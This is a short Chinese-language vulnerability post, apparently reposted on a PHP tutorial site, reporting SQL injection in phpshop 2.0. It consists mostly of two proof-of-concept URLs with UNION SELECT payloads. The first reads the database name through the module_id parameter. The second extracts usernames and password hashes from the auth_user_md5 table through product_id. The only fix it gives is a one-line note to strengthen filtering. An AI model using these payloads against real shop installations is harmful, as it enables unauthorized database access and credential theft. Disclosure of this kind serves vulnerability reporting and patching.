标题 : phpshop 2.0 SQL Injection Vulnerability
作者 : By onestree
下载 地址 : http://code.google.com/p/phpshop/downloads/list
测试地址: windows 7 / ubuntu
SQLi p0c:
==================
http://www.2cto.com /phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5-- 修复: 加强过滤
查看更多关于phpshop 2.0 SQL注入及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14337